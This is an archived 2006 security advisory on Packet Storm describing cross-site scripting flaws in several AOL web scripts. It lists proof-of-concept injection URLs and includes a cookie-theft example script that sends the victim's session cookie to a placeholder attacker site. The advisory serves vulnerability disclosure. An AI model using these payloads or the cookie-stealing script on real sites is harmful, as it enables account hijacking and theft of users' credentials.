what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

aolXSS.txt

aolXSS.txt
Posted Jan 10, 2006
Authored by Simo64 | Site morx.org

Various America Online (AOL) scripts are susceptible to cross site scripting attacks. Full details provided.

tags | exploit, xss
SHA-256 | 2ab707ded3fd5add6400840d28183f089d70c10ab488dab6fd4bb309a690db76

aolXSS.txt

Change Mirror Download
Title: AOL Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AOL.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Tested on: Microsoft IE 6.0 and FireFox 5.1

Details:

AOL.com search engines are created with AOLserver Dynamic Pages (or ADP).
ADP are a set of web server extensions for designing dynamically created
documents. Utilizing AOLserver, ADP return a document to the user based on
running a set of Tcl code with arguments provided by the user. They are
based on Microsoft's own Active Server Pages. AIM.com ADP scripts are
prone to cross-site scripting attacks. This problem is due to a failure in
the applications to properly sanitize user-supplied input.

Impact:

an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified AIM user in the context of
the AIM webpage. resulting in the theft of cookie-based authentication
giving the attacker temporary access to the victim's account (email box,
etc) as well as other type of attacks.

Screen captures:

http://www.morx.org/AOL-XSS.JPG
http://www.morx.org/AOL2-XSS.JPG

Affected scripts with proof of concept exploit:

http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=1&_dpath=pc_main,pc_main&_dsect=1#

http://health.aol.com/dirmodule.adp?_did=41623"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#

http://health.aol.com/dirmodule.adp?_did=41623"><img%20src="http://www.morx.org/morx.png"%20</src>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#


http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

http://aolexpressions.aol.com/main.adp?expTypeId=1"><script>alert('VULNERABLE')</script>&clientId=2

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>alert('VULNERABLE')</script>

http://food.aol.com/food/recipefinder.dyn?action=howItWorks"><script>alert('VULNERABLE')</script>

Exemple of Cookie theft:

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>document.location='http://www.some-attacker-site/grab.php?cookie='+escape(document.cookie).substr(0,1900)</script>

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close